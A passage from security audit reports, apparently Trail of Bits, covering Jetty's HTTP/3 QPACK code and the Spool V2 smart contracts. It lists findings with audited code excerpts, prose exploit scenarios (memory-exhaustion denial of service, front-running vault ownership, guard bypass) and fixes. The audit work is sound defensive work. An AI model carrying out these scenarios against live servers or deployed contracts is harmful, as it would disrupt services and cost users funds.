the decoder will continue reading at the wrong point in the bytestring. The same issue occurs if multibyte characters were used in the value field. The same issue appears in EncodableEntry.ReferencedNameEntry.encode : if (_huffman) 164 // Encode the value. 165 String value = getValue(); 166 167 { 168 169 170 171 } 172 173 { 174 175 176 177 } else buffer.put(( byte ) 0x80 ); NBitIntegerEncoder.encode(buffer, 7 , HuffmanEncoder.octetsNeeded(value)); HuffmanEncoder.encode(buffer, value); buffer.put(( byte ) 0x00 ); NBitIntegerEncoder.encode(buffer, 7 , value.length()); buffer.put(value.getBytes()); Figure 24.2: EncodableEntry.java , lines 164–177 If value has multibyte characters, it will be incorrectly encoded in lines 174–176. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server attempts to add the Set-Cookie header, setting a cookie value to a UTF-8-encoded string that contains multibyte characters. This causes an incorrect cookie value to be set and the rest of the headers in this message to be parsed incorrectly. 76 OSTIF Eclipse: Jetty Security Assessment Recommendations Short term, have the encode function in both EncodableEntry.LiteralEntry and EncodableEntry.ReferencedNameEntry encode the length of the string using string.getBytes() rather than string.length() . 77 OSTIF Eclipse: Jetty Security Assessment +25. No limits on maximum capacity in QPACK decoder Severity: High Difficulty: Medium Type: Denial of Service Finding ID: TOB-JETTY-25 Target: ● org.eclipse.jetty.http3.qpack.QpackDecoder ● org.eclipse.jetty.http3.qpack.internal.parser.DecoderInstructi onParser ● org.eclipse.jetty.http3.qpack.internal.table.DynamicTable Description In QPACK, an encoder can set the dynamic table capacity of the decoder using a “Set Dynamic Table Capacity” instruction. The HTTP/3 specification requires that the capacity be no larger than the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit chosen by the decoder. However, nowhere in the QPACK code is this limit checked for. This means that the encoder can choose whatever capacity it wants (up to Java’s maximum integer value), allowing it to take up large amounts of space on the decoder’s memory. Jetty’s HTTP/3 code is still considered experimental, so this issue should not affect production code, but it should be fixed before announcing HTTP/3 support to be production-ready. Exploit Scenario A Jetty server supporting QPACK is running. An attacker opens a connection to the server. He sends a “Set Dynamic Table Capacity” instruction, setting the dynamic table capacity to Java’s maximum integer value, 2 31-1 (2.1 GB). He then repeatedly enters very large values into the server’s dynamic table using an “Insert with Literal Name” instruction until the full 2.1 GB capacity is taken up. The attacker repeats this using multiple connections until the server runs out of memory and crashes. Recommendations Short term, enforce the SETTINGS_QPACK_MAX_TABLE_CAPACITY limit on the capacity. Long term, audit Jetty’s implementation of QPACK and other protocols to ensure that Jetty enforces limits as required by the standards. 78 OSTIF Eclipse: Jetty Security Assessment diff --git a/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt b/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt new file mode 100644 index 0000000..0b0b1c9 --- /dev/null +++ b/findings_newupdate/tob/2023-03-spool-platformv2-securityreview.txt @@ -0,0 +1,37 @@ +1. Solidity compiler optimizations can be problematic Severity: Undetermined Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-1 Target: foundry.toml Description Spool V2 has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed . Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past . A high-severity bug in the emscripten -generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6 . More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe . It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations—or in the Emscripten transpilation to solc-js —causes a security vulnerability in the Spool V2 contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. +2. Risk of SmartVaultFactory DoS due to lack of access controls on grantSmartVaultOwnership Severity: High Difficulty: Low Type: Access Controls Finding ID: TOB-SPL-2 Target: SmartVaultFactory.sol , access/SpoolAccessControl.sol Description Anyone can set the owner of the next smart vault to be created, which will result in a DoS of the SmartVaultFactory contract. The grantSmartVaultOwnership function in the SpoolAccessControl contract allows anyone to set the owner of a smart vault. This function reverts if an owner is already set for the provided smart vault. function grantSmartVaultOwnership( address smartVault, address owner) external { if (smartVaultOwner[smartVault] != address (0)) { revert SmartVaultOwnerAlreadySet(smartVault); } smartVaultOwner[smartVault] = owner; } Figure 2.1: The grantSmartVaultOwnership function in SpoolAccessControl.sol The SmartVaultFactory contract implements two functions for deploying new smart vaults: the deploySmartVault function uses the create opcode, and the deploySmartVaultDeterministically function uses the create2 opcode. Both functions create a new smart vault and call the grantSmartVaultOwnership function to make the message sender the owner of the newly created smart vault. Any user can pre-compute the address of the new smart vault for a deploySmartVault transaction by using the address and nonce of the SmartVaultFactory contract; to compute the address of the new smart vault for a deploySmartVaultDeterministically transaction, the user could front-run the transaction to capture the salt provided by the user who submitted it. Exploit Scenario Eve pre-computes the address of the new smart vault that will be created by the deploySmartVault function in the SmartVaultFactory contract. She then calls the grantSmartVaultOwnership function with the pre-computed address and a nonzero address as arguments. Now, every call to the deploySmartContract function reverts, making the SmartVaultFactory contract unusable. Using a similar strategy, Eve blocks the deploySmartVaultDeterministically function by front-running the user transaction to set the owner of the smart vault address computed using the user-provided salt. Recommendations Short term, add the onlyRole(ROLE_SMART_VAULT_INTEGRATOR, msg.sender) modifier to the grantSmartVaultOwnership function to restrict access to it. Long term, follow the principle of least privilege by restricting access to the functions that grant specific privileges to actors of the system. +3. Lack of zero-value check on constructors and initializers Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-3 Target: Several contracts Description Several contracts’ constructors and initialization functions fail to validate incoming arguments. As a result, important state variables could be set to the zero address, which would result in the loss of assets. constructor ( ISpoolAccessControl accessControl_, IAssetGroupRegistry assetGroupRegistry_, IRiskManager riskManager_, IDepositManager depositManager_, IWithdrawalManager withdrawalManager_, IStrategyRegistry strategyRegistry_, IMasterWallet masterWallet_ , IUsdPriceFeedManager priceFeedManager_, address ghostStrategy ) SpoolAccessControllable(accessControl_) { _assetGroupRegistry = assetGroupRegistry_; _riskManager = riskManager_; _depositManager = depositManager_; _withdrawalManager = withdrawalManager_; _strategyRegistry = strategyRegistry_; _masterWallet = masterWallet_; _priceFeedManager = priceFeedManager_; _ghostStrategy = ghostStrategy; } Figure 3.1: The SmartVaultManager contract’s constructor function in spool-v2-core/SmartVaultManager.sol#L111–L130 These constructors include that of the SmartVaultManager contract, which sets the _masterWallet address (figure 3.1). SmartVaultManager contract is the entry point of the system and is used by users to deposit their tokens. User deposits are transferred to the _masterWallet address (figure 3.2). function _depositAssets (DepositBag calldata bag) internal returns ( uint256 ) { [...] for ( uint256 i ; i < deposits.length; ++i) { IERC20(tokens[i]).safeTransferFrom( msg.sender , address ( _masterWallet ), deposits[i]); } [...] } Figure 3.2: The _depositAssets function in spool-v2-core/SmartVaultManager.sol#L649–L676 If _masterWallet is set to the zero address, the tokens will be transferred to the zero address and will be lost permanently. The constructors and initialization functions of the following contracts also fail to validate incoming arguments: ● StrategyRegistry ● DepositSwap ● SmartVault ● SmartVaultFactory ● SpoolAccessControllable ● DepositManager ● RiskManager ● SmartVaultManager ● WithdrawalManager ● RewardManager ● RewardPool ● Strategy Exploit Scenario Bob deploys the Spool system. During deployment, Bob accidentally sets the _masterWallet parameter of the SmartVaultManager contract to the zero address. Alice, excited about the new protocol, deposits 1 million WETH into it. Her deposited WETH tokens are transferred to the zero address, and Alice loses 1 million WETH. Recommendations Short term, add zero-value checks on all constructor arguments to ensure that the deployer cannot accidentally set incorrect values. Long term, use Slither , which will catch functions that do not have zero-value checks. +4. Upgradeable contracts set state variables in the constructor Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-4 Target: managers/RewardManager.sol , managers/RewardPool.sol , strategies/Strategy.sol Description The state variables set in the constructor of the RewardManager implementation contract are not visible in the proxy contract, making the RewardManager contract unusable. The same issue exists in the RewardPool and Strategy smart contracts. Upgradeable smart contracts using the delegatecall proxy pattern should implement an initializer function to set state variables in the proxy contract storage. The constructor function can be used to set immutable variables in the implementation contract because these variables do not consume storage slots and their values are inlined in the deployed code. The RewardManager contract is deployed as an upgradeable smart contract, but it sets the state variable _assetGroupRegistry in the constructor function. contract RewardManager is IRewardManager, RewardPool, ReentrancyGuard { ... /* ========== STATE VARIABLES ========== */ /// @notice Asset group registry IAssetGroupRegistry private _assetGroupRegistry; ... constructor ( ISpoolAccessControl spoolAccessControl, IAssetGroupRegistry assetGroupRegistry_, bool allowPoolRootUpdates ) RewardPool(spoolAccessControl, allowPoolRootUpdates) { _assetGroupRegistry = assetGroupRegistry_; } Figure 4.1: The constructor function in spool-v2-core/RewardManager.sol The value of the _assetGroupRegistry variable will not be visible in the proxy contract, and the admin will not be able to add reward tokens to smart vaults, making the RewardManager contract unusable. The following smart contracts are also affected by the same issue: 1. The ReentrancyGuard contract, which is non-upgradeable and is extended by RewardManager 2. The RewardPool contract, which sets the state variable allowUpdates in the constructor 3. The Strategy contract, which sets the state variable StrategyName in the constructor Exploit Scenario Bob creates a smart vault and wants to add a reward token to it. He calls the addToken function on the RewardManager contract, but the transaction unexpectedly reverts. Recommendations Short term, make the following changes: 1. Make _assetGroupRegistry an immutable variable in the RewardManager contract. 2. Extend the ReentrancyGuardUpgradeable contract in the RewardManager contract. 3. Make allowUpdates an immutable variable in the RewardPool contract. 4. Move the statement _strategyName = strategyName_; from the Strategy contract’s constructor to the contract’s __Strategy_init function. 5. Review all of the upgradeable contracts to ensure that they extend only upgradeable library contracts and that the inherited contracts have a __gap storage variable to prevent storage collision issues with future upgrades. Long term, review all of the upgradeable contracts to ensure that they use the initializer function instead of the constructor function to set state variables. Use slither-check-upgradeability to find issues related to upgradeable smart contracts. 5. Insucient validation of oracle price data Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-5 Target: managers/UsdPriceFeedManager.sol Description The current validation of the values returned by Chainlink’s latestRoundData function could result in the use of stale data. The latestRoundData function returns the following values: the answer , the roundId (which represents the current round), the answeredInRound value (which corresponds to the round in which the answer was computed), and the updatedAt value (which is the timestamp of when the round was updated). An updatedAt value of 0 means that the round is not complete and should not be used. An answeredInRound value that is less than the roundId indicates stale data. However, the _getAssetPriceInUsd function in the UsdPriceFeeManager contract does not check for these conditions. function _getAssetPriceInUsd( address asset) private view returns ( uint256 assetPrice) { ( /* uint80 roundId */ , int256 answer, /* uint256 startedAt */ , /* uint256 updatedAt */ , /* uint80 answeredInRound */ ) = assetPriceAggregator[asset].latestRoundData(); if (answer < 1) { revert NonPositivePrice({price: answer}); } return uint256 (answer); } Figure 5.1: The _getAssetPriceInUsd function in spool-v2-core/UsdPriceFeedManager.sol#L99–L116 Exploit Scenario The price of an asset changes, but the Chainlink price feed is not updated correctly. The system uses the stale price data, and as a result, the asset is not correctly distributed in the strategies. Recommendations Short term, have _getAssetPriceInUsd perform the following sanity check: require(updatedAt != 0 && answeredInRound == roundId) . This check will ensure that the round has finished and that the pricing data is from the current round. Long term, when integrating with third-party protocols, make sure to accurately read their documentation and implement the appropriate sanity checks. 6. Incorrect handling of fromVaultsOnly in removeStrategy Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-6 Target: managers/SmartVaultManager.sol Description The removeStrategy function allows Spool admins to remove a strategy from the smart vaults using it. Admins are also able to remove the strategy from the StrategyRegistry contract, but only if the value of fromVaultsOnly is false ; however, the implementation enforces the opposite, as shown in figure 6.1. function removeStrategy( address strategy, bool fromVaultsOnly) external { _checkRole(ROLE_SPOOL_ADMIN, msg.sender ); _checkRole(ROLE_STRATEGY, strategy); ... if ( fromVaultsOnly ) { _strategyRegistry.removeStrategy(strategy); } } Figure 6.1: The removeStrategy function in spool-v2-core/SmartVaultManager.sol#L298–L317 Exploit Scenario Bob, a Spool admin, calls removeStrategy with fromVaultsOnly set to true , believing that this call will not remove the strategy from the StrategyRegistry contract. However, once the transaction is executed, he discovers that the strategy was indeed removed. Recommendations Short term, replace if (fromVaultsOnly) with if (!fromVaultsOnly) in the removeStrategy function to implement the expected behavior. Long term, improve the system’s unit and integration tests to catch issues such as this one. 7. Risk of LinearAllocationProvider and ExponentialAllocationProvider reverts due to division by zero Severity: Medium Difficulty: High Type: Data Validation Finding ID: TOB-SPL-7 Target: providers/LinearAllocationProvider.sol , providers/ExponentialAllocationProvider.sol Description The LinearAllocationProvider and ExponentialAllocationProvider contracts’ calculateAllocation function can revert due to a division-by-zero error: LinearAllocationProvider ’s function reverts when the sum of the strategies’ APY values is 0 , and ExponentialAllocationProvider ’s function reverts when a single strategy has an APY value of 0 . Figure 7.1 shows a snippet of the LinearAllocationProvider contract’s calculateAllocation function; if the apySum variable, which is the sum of all the strategies’ APY values, is 0 , a division-by-zero error will occur. uint8 [] memory arrayRiskScores = data.riskScores; for ( uint8 i; i < data.apys.length; ++i) { apySum += (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); riskSum += arrayRiskScores[i]; } uint8 riskt = uint8 (data.riskTolerance + 10); // from 0 to 20 for ( uint8 i; i < data.apys.length; ++i) { uint256 apy = data.apys[i] > 0 ? uint256 (data.apys[i]) : 0; apy = (apy * FULL_PERCENT) / apySum ; Figure 7.1: Part of the calculateAllocation function in spool-v2-core/LinearAllocationProvider.sol#L39–L49 Figure 7.2 shows that for the ExponentialAllocationProvider contract’s calculateAllocation function, if the call to log_2 occurs with partApy set to 0 , the function will revert because of log_2 ’s require statement shown in figure 7.3. for ( uint8 i; i < data.apys.length; ++i) { uint256 uintApy = (data.apys[i] > 0 ? uint256 (data.apys[i]) : 0); int256 partRiskTolerance = fromUint( uint256 (riskArray[ uint8 (20 - riskt)])); partRiskTolerance = div(partRiskTolerance, _100); int256 partApy = fromUint(uintApy); partApy = div(partApy, _100); int256 apy = exp_2(mul(partRiskTolerance, log_2(partApy) )); Figure 7.2: Part of the calculateAllocation function in spool-v2-core/ExponentialAllocationProvider.sol#L323–L331 function log_2( int256 x) internal pure returns ( int256 ) { unchecked { require (x > 0); Figure 7.3: Part of the log_2 function in spool-v2-core/ExponentialAllocationProvider.sol#L32–L34 Exploit Scenario Bob deploys a smart vault with two strategies using the ExponentialAllocationProvider contract. At some point, one of the strategies has 0 APY, causing the transaction call to reallocate the assets to unexpectedly revert. Recommendations Short term, modify both versions of the calculateAllocation function so that they correctly handle cases in which a strategy’s APY is 0 . Long term, improve the system’s unit and integration tests to ensure that the basic operations work as expected. 8. Strategy APYs are never updated Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-8 Target: managers/StrategyRegistry.sol Description The _updateDhwYieldAndApy function is never called. As a result, each strategy’s APY will constantly be set to 0 . function _updateDhwYieldAndApy( address strategy, uint256 dhwIndex, int256 yieldPercentage) internal { if (dhwIndex > 1) { unchecked { _stateAtDhw[address(strategy)][dhwIndex - 1].timestamp); int256 timeDelta = int256 (block.timestamp - if (timeDelta > 0) { timeDelta; int256 normalizedApy = yieldPercentage * SECONDS_IN_YEAR_INT / int256 weight = _getRunningAverageApyWeight(timeDelta); _apys[strategy] = (_apys[strategy] * (FULL_PERCENT_INT - weight) + normalizedApy * weight) / FULL_PERCENT_INT; } } } } Figure 8.1: The _updateDhwYieldAndApy function in spool-v2-core/StrategyManager.sol#L298–L317 A strategy’s APY is one of the parameters used by an allocator provider to decide where to allocate the assets of a smart vault. If a strategy’s APY is 0 , the LinearAllocationProvider and ExponentialAllocationProvider contracts will both revert when calculateAllocation is called due to a division-by-zero error. // set allocation if (uint16a16.unwrap(allocations) == 0) { _riskManager.setRiskProvider(smartVaultAddress, specification.riskProvider); _riskManager.setRiskTolerance(smartVaultAddress, specification.riskTolerance); _riskManager.setAllocationProvider(smartVaultAddress, specification.allocationProvider); allocations = _riskManager.calculateAllocation(smartVaultAddress, specification.strategies); } Figure 8.2: Part of the _integrateSmartVault function, which is called when a vault is created, in spool-v2-core/SmartVaultFactory.sol#L313–L3 20 When a vault is created, the code in figure 8.2 is executed. For vaults whose strategyAllocation variable is set to 0 , which means the value will be calculated by the smart contract, and whose allocationProvide r variable is set to the LinearAllocationProvider or ExponentialAllocationProvider contract, the creation transaction will revert due to a division-by-zero error. Transactions for creating vaults with a nonzero strategyAllocation and with the same allocationProvider values mentioned above will succeed; however, the fund reallocation operation will revert because the _updateDhwYieldAndApy function is never called, causing the strategies’ APYs to be set to 0 , in turn causing the same division-by-zero error. Refer to finding TOB-SPL-7 , which is related to this issue; even if that finding is fixed, incorrect results would still occur because of the missing _updateDhwYieldAndApy calls. Exploit Scenario Bob tries to deploy a smart vault with strategyAllocation set to 0 and allocationProvide r set to LinearAllocationProvider . The transaction unexpectedly fails. Recommendations Short term, add calls to _updateDhwYieldAndApy where appropriate. Long term, improve the system’s unit and integration tests to ensure that the basic operations work as expected. 9. Incorrect bookkeeping of assets deposited into smart vaults Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-9 Target: managers/DepositManager.sol Description Assets deposited by users into smart vaults are incorrectly tracked. As a result, assets deposited into a smart vault’s strategies when the flushSmartVault function is invoked correspond to the last deposit instead of the sum of all deposits into the strategies. When depositing assets into a smart vault, users can decide whether to invoke the flushSmartVault function. A smart vault flush is a synchronization process that makes deposited funds available to be deployed into the strategies and makes withdrawn funds available to be withdrawn from the strategies. However, the internal bookkeeping of deposits keeps track of only the last deposit of the current flush cycle instead of the sum of all deposits (figure 9.1). function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns ( uint256 [] memory , uint256 ) { ... // transfer tokens from user to master wallet for ( uint256 i; i < bag2.tokens.length; ++i) { _vaultDeposits[bag.smartVault][bag2.flushIndex][i] = bag.assets[i]; } ... Figure 9.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439 The _vaultDeposits variable is then used to calculate the asset distribution in the flushSmartVault function. function flushSmartVault( address smartVault, uint256 flushIndex, address [] calldata strategies, uint16a16 allocation, address [] calldata tokens ) external returns (uint16a16) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); if (_vaultDeposits[smartVault][flushIndex][0] == 0) { return uint16a16.wrap(0); } // handle deposits uint256 [] memory exchangeRates = SpoolUtils.getExchangeRates(tokens, _priceFeedManager); _flushExchangeRates[smartVault][flushIndex].setValues(exchangeRates); uint256 [][] memory distribution = distributeDeposit ( DepositQueryBag1({ deposit: _vaultDeposits[smartVault][flushIndex].toArray(tokens.length) , exchangeRates: exchangeRates, allocation: allocation, strategyRatios: SpoolUtils.getStrategyRatiosAtLastDhw(strategies, _strategyRegistry) }) ); ... return _strategyRegistry.addDeposits(strategies, distribution) ; } Figure 9.2: A snippet of the flushSmartVault function in spool-v2-core/DepositManager.sol#L188–L 226 Lastly, the _strategyRegistry.addDeposits function is called with the computed distribution, which adds the amounts to deploy in the next doHardWork function call in the _assetsDeposited variable (figure 9.3). function addDeposits( address [] calldata strategies_, uint256 [][] calldata amounts) { external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender ) returns (uint16a16) uint16a16 indexes; for ( uint256 i; i < strategies_.length; ++i) { address strategy = strategies_[i]; uint256 latestIndex = _currentIndexes[strategy]; indexes = indexes.set(i, latestIndex); for ( uint256 j = 0; j < amounts[i].length; j++) { _assetsDeposited[strategy][latestIndex][j] += amounts[i][j]; } } return indexes; } Figure 9.3: The addDeposits function in spool-v2-core/StrategyRegistry.sol#L343–L361 The next time the doHardWork function is called, it will transfer the equivalent of the last deposit’s amount instead of the sum of all deposits from the master wallet to the assigned strategy (figure 9.4). function doHardWork(DoHardWorkParameterBag calldata dhwParams) external whenNotPaused { ... // Transfer deposited assets to the strategy. for ( uint256 k; k < assetGroup.length; ++k) { if (_assetsDeposited[strategy][dhwIndex][k] > 0) { _masterWallet.transfer( IERC20(assetGroup[k]), strategy, _assetsDeposited[strategy][dhwIndex][k] ); } } ... Figure 9.4: A snippet of the doHardWork function in spool-v2-core/StrategyRegistry.sol#L222–L3 41 Exploit Scenario Bob deploys a smart vault. One hundred deposits are made before a smart vault flush is invoked, but only the last deposit’s assets are deployed to the underlying strategies, severely impacting the smart vault’s performance. Recommendations Short term, modify the depositAssets function so that it correctly tracks all deposits within a flush cycle, rather than just the last deposit. Long term, improve the system’s unit and integration tests: test a smart vault with a single strategy and multiple strategies to ensure that smart vaults behave correctly when funds are deposited and deployed to the underlying strategies. 10. Risk of malformed calldata of calls to guard contracts Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-10 Target: managers/GuardManager.sol Description The GuardManager contract does not pad custom values while constructing the calldata for calls to guard contracts. The calldata could be malformed, causing the affected guard contract to give incorrect results or to always revert calls. Guards for vaults are customizable checks that are executed on every user action. The result of a guard contract either approves or disapproves user actions. The GuardManager contract handles the logic to call guard contracts and to check their results (figure 10.1). function runGuards( address smartVaultId , RequestContext calldata context) external view { [...] bytes memory encoded = _encodeFunctionCall(smartVaultId, guard , context); ( bool success , bytes memory data) = guard.contractAddress.staticcall(encoded) ; _checkResult (success, data, guard.operator, guard.expectedValue, i); } } Figure 10.1: The runGuards function in spool-v2-core/GuardManager.sol#L19–L33 The arguments of the runGuards function include information related to the given user action and custom values defined at the time of guard definition. The GuardManager.setGuards function initializes the guards in the GuardManager contract. Using the guard definition, the GuardManager contract manually constructs the calldata with the selected values from the user action information and the custom values (figure 10.2). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { [...] result = bytes .concat(result, methodID ); for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(paramsEndLoc)); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length ; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } customValueIdx = 0 ; for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode(guard.methodParamValues[customValueIdx].length / 32 )); result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { customValueIdx++; } [...] } return result; } Figure 10.2: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 However, the contract concatenates the custom values without considering their lengths and required padding. If these custom values are not properly padded at the time of guard initialization, the call will receive malformed data. As a result, either of the following could happen: 1. Every call to the guard contract will always fail, and user action transactions will always revert. The smart vault using the guard will become unusable. 2. The guard contract will receive incorrect arguments and return incorrect results. Invalid user actions could be approved, and valid user actions could be rejected. Exploit Scenario Bob deploys a smart vault and creates a guard for it. The guard contract takes only one custom value as an argument. Bob created the guard definition in GuardManager without padding the custom value. Alice tries to deposit into the smart vault, and the guard contract is called for her action. The call to the guard contract fails, and the transaction reverts. The smart vault is unusable. Recommendations Short term, modify the associated code so that it verifies that custom values are properly padded before guard definitions are initialized in GuardManager.setGuards . Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. Additionally, improve the user documentation with necessary technical details to properly use the system. 11. GuardManager does not account for all possible types when encoding guard arguments Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-11 Target: managers/GuardManager.sol Description While encoding arguments for guard contracts, the GuardManager contract assumes that all static types are encoded to 32 bytes. This assumption does not hold for fixed-size static arrays and structs with only static type members. As a result, guard contracts could receive incorrect arguments, leading to unintended behavior. The GuardManager._encodeFunctionCall function manually encodes arguments to call guard contracts (figure 11.1). function _encodeFunctionCall ( address smartVaultId , GuardDefinition memory guard, RequestContext memory context) internal pure returns ( bytes memory ) { bytes4 methodID = bytes4 ( keccak256 (abi.encodePacked(guard.methodSignature))); uint256 paramsLength = guard.methodParamTypes.length ; bytes memory result = new bytes ( 0 ); result = bytes .concat(result, methodID); uint16 customValueIdx = 0 ; uint256 paramsEndLoc = paramsLength * 32 ; // Loop through parameters and // - store values for simple types // - store param value location for dynamic types for ( uint256 i ; i < paramsLength; ++i) { GuardParamType paramType = guard.methodParamTypes[i]; if (paramType == GuardParamType.DynamicCustomValue) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + guard.methodParamValues[customValueIdx].length; customValueIdx++; } else if (paramType == GuardParamType.CustomValue) { result = bytes .concat(result, guard.methodParamValues[customValueIdx]); customValueIdx++; } [...] } else if (paramType == GuardParamType.Assets) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.assets.length * 32 ; } else if (paramType == GuardParamType.Tokens) { result = bytes .concat(result, abi.encode( paramsEndLoc )); paramsEndLoc += 32 + context.tokens.length * 32 ; } else { revert InvalidGuardParamType( uint256 (paramType)); } } [...] return result; } Figure 11.1: The _encodeFunctionCall function in spool-v2-core/GuardManager.sol#L111–L177 The function calculates the offset for dynamic type arguments assuming that every parameter, static or dynamic, takes exactly 32 bytes. However, fixed-length static type arrays and structs with only static type members are considered static. All static type values are encoded in-place, and static arrays and static structs could take more than 32 bytes. As a result, the calculated offset for the start of dynamic type arguments could be wrong, which would cause incorrect values for these arguments to be set, resulting in unintended behavior. For example, the guard could approve invalid user actions and reject valid user actions or revert every call. Exploit Scenario Bob deploys a smart vault and creates a guard contract that takes the custom value of a fixed-length static array type. The guard contract uses RequestContext assets. Bob correctly creates the guard definition in GuardManager , but the GuardManager._encodeFunctionCall function incorrectly encodes the arguments. The guard contract fails to decode the arguments and always reverts the execution. Recommendations Short term, modify the GuardManager._encodeFunctionCall function so that it considers the encoding length of the individual parameters and calculates the offsets correctly. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. 12. Use of encoded values in guard contract comparisons could lead to opposite results Severity: Low Difficulty: Medium Type: Undefined Behavior Finding ID: TOB-SPL-12 Target: managers/GuardManager.sol Description The GuardManager contract compares the return value of a guard contract to an expected value. However, the contract uses encoded versions of these values in the comparison, which could lead to incorrect results for signed values with numerical comparison operators. The GuardManager contract calls the guard contract and validates the return value using the GuardManager._checkResult function (figure 12.1). function _checkResult ( bool success , bytes memory returnValue, bytes2 operator, bytes32 value , uint256 guardNum ) internal pure { if (!success) revert GuardError(); bool result = true ; if (operator == bytes2( "==" )) { result = abi.decode(returnValue, ( bytes32 )) == value; } else if (operator == bytes2( "<=" )) { result = abi.decode(returnValue, ( bytes32 )) <= value; } else if (operator == bytes2( ">=" )) { result = abi.decode(returnValue, ( bytes32 )) >= value; } else if (operator == bytes2( "<" )) { result = abi.decode(returnValue, ( bytes32 )) < value; } else if (operator == bytes2( ">" )) { result = abi.decode(returnValue, ( bytes32 )) > value; } else { result = abi.decode(returnValue, ( bool )); } if (!result) revert GuardFailed(guardNum); } Figure 12.1: The _checkResult function in spool-v2-core/GuardManager.sol#L80–L105 When a smart vault creator defines a guard using the GuardManager.setGuards function, they define a comparison operator and the expected value, which the GuardManager contract uses to compare with the return value of the guard contract. The comparison is performed on the first 32 bytes of the ABI-encoded return value and the expected value, which will cause issues depending on the return value type. First, the numerical comparison operators ( < , > , <= , >= ) are not well defined for bytes32 ; therefore, the contract treats encoded values with padding as uint256 values before comparing them. This way of comparing values gives incorrect results for negative values of the int type. The Solidity documentation includes the following description about the encoding of int type values: int: enc(X) is the big-endian two’s complement encoding of X, padded on the higher-order (left) side with 0xff bytes for negative X and with zero-bytes for non-negative X such that the length is 32 bytes. Figure 12.2: A description about the encoding of int type values in the Solidity documentation Because negative values are padded with 0xff and positive values with 0x00 , the encoded negative values will be considered greater than the encoded positive values. As a result, the result of the comparison will be the opposite of the expected result. Second, only the first 32 bytes of the return value are considered for comparison. This will lead to inaccurate results for return types that use more than 32 bytes to encode the value. Exploit Scenario Bob deploys a smart vault and intends to allow only users who own B NFTs to use it. B NFTs are implemented using ERC-1155. Bob uses the B contract as a guard with the comparison operator > and an expected value of 0 . Bob calls the function B.balanceOfBatch to fetch the NFT balance of the user. B.balanceOfBatch returns uint256[] . The first 32 bytes of the return data contain the offset into the return data, which is always nonzero. The comparison passes for every user regardless of whether they own a B NFT. As a result, every user can use Bob’s smart vault. Recommendations Short term, restrict the return value of a guard contract to a Boolean value. If that is not possible, document the limitations and risks surrounding the guard contracts. Additionally, consider manually checking new action guards with respect to these limitations. Long term, avoid implementing low-level manipulations. If such implementations are unavoidable, carefully review the Solidity documentation before implementing them to ensure that they are implemented correctly. 13. Lack of contract existence checks on low-level calls Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-SPL-13 Target: GuardManager.sol , Swapper.sol Description The GuardManager and Swapper contracts use low-level calls without contract existence checks. If the target address is incorrect or the contract at that address is destroyed, a low-level call will still return success. The Swapper.swap function uses the address().call(...) function to swap tokens (figure 13.1). function swap ( address [] calldata tokensIn, SwapInfo[] calldata swapInfo, address [] calldata tokensOut, address receiver ) external returns ( uint256 [] memory tokenAmounts) { // Perform the swaps. for ( uint256 i ; i < swapInfo.length; ++i) { if (!exchangeAllowlist[swapInfo[i].swapTarget]) { revert ExchangeNotAllowed(swapInfo[i].swapTarget); } _approveMax(IERC20(swapInfo[i].token), swapInfo[i].swapTarget); ( bool success , bytes memory data) = swapInfo[i].swapTarget.call(swapInfo[i].swapCallData); if (!success) revert (SpoolUtils.getRevertMsg(data)); } // Return unswapped tokens. for ( uint256 i 